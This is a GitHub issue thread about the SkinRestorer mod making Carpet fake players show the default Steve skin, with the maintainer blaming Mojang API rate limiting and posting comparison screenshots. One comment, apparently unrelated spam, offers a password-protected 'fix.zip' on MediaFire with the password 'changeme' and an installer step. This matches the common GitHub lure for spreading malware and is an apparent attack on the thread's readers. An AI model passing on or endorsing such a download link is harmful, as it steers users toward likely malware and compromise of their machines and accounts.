### ISSUE TITLE
Interfering with the normal skin loading of the carpet's fake player.

### ISSUE THREAD

**Issue by Water-Buckets** [Suiranoil/SkinRestorer#32]
With this module enabled, the carpet fake players' skins will all become the default Steve, instead of wearing the skins of the licensed accounts with their names, as was the case.
I wonder if this is a bug or a feature.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Suiranoil** [comment]
It seems to be caused by mojang's api rate limiting and happens even on servers running in online mode without mod installed

Without SkinRestorer (Insecure):
![image](https://github.com/user-attachments/assets/79b70ff7-77c6-4049-ad49-9252174dae20)
With SkinRestorer (Insecure):
![image](https://github.com/user-attachments/assets/c22a55a2-567c-4346-89c3-5ad02d87d595)
Without SkinRestorer (Secure):
![image](https://github.com/user-attachments/assets/732e96b9-4881-4d65-8187-4d18f89c6a4a)
With SkinRestorer (Secure):
![image](https://github.com/user-attachments/assets/0a225930-0659-4347-b20d-988248f44b4a)
